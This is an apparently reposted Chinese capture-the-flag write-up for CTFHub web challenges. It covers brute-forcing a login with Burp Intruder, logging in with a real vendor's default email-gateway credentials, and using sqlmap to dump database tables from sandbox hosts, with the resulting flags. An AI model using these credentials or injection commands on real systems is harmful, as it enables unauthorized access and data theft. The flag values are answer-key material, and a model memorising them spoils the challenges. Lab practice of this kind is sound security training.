CTFHub - Web(三)
阅读原文时间:2023年07月08日阅读:2

密码口令:

1.随意输入账号密码,抓包,

2.右击,“Send to Intruder”,打开选项卡Intruder,点击position,椭圆框处软件已经自动为我们把要爆破的字段标注了出来。设置payload,加载自己的密码字典(包含一些常见的密码),开始爆破。

1. 根据题目提示,去搜索北京亿中邮信息技术有限公司邮件网关的默认口令,

2.尝试如下账号密码,

账号:eyougw
密码:admin@(eyou)

flag:

ctfhub{de322d85c14bfa1d213c213f8e09bd0fe0aaf060}

SQL注入:

1.查数据库名

sqlmap -u http://challenge-2dceabc36651a92d.sandbox.ctfhub.com:10080/?id=1 --dbs

2.查表名,

sqlmap -u challenge-2dceabc36651a92d.sandbox.ctfhub.com:10080/?id=1 -D sqli --tables

3.查字段,

sqlmap -u challenge-2dceabc36651a92d.sandbox.ctfhub.com:10080/?id=1 -D sqli -T flag --columns

4.dump数据,得到flag,

sqlmap -u challenge-2dceabc36651a92d.sandbox.ctfhub.com:10080/?id=1 -D sqli -T flag -C flag --dump

flag:

ctfhub{bfb71e0bc322928774fdd00a1602080eccff4955}

1.查数据库,

sqlmap -u http://challenge-57aed0119112ba8f.sandbox.ctfhub.com:10080/?id=1 --dbs

2.查表名,

sqlmap -u http://challenge-57aed0119112ba8f.sandbox.ctfhub.com:10080/?id=1 -D sqli --tables

3.查字段名,

sqlmap -u http://challenge-57aed0119112ba8f.sandbox.ctfhub.com:10080/?id=1 -D sqli -T flag --columns

4.dump数据,得到flag,

sqlmap -u http://challenge-57aed0119112ba8f.sandbox.ctfhub.com:10080/?id=1 -D sqli -T flag -C flag --dump

flag:

ctfhub{fb28072f96197414fe42d01ca8fa5c2340ac2eb2}

步骤同上,

flag:

ctfhub{3970aeb8b23cf20e2b7bd93088b12b3db1a0d4f5}

步骤同上,时间较长

flag:

ctfhub{aed7e9ba490f672fa671b9130d880b68d67a6528} 

步骤同上,时间较长,

flag:

ctfhub{25e06972b993b34d27edfca8692ef07b7e90a70f}

手机扫一扫

移动阅读更方便

阿里云服务器
腾讯云服务器
七牛云服务器

你可能感兴趣的文章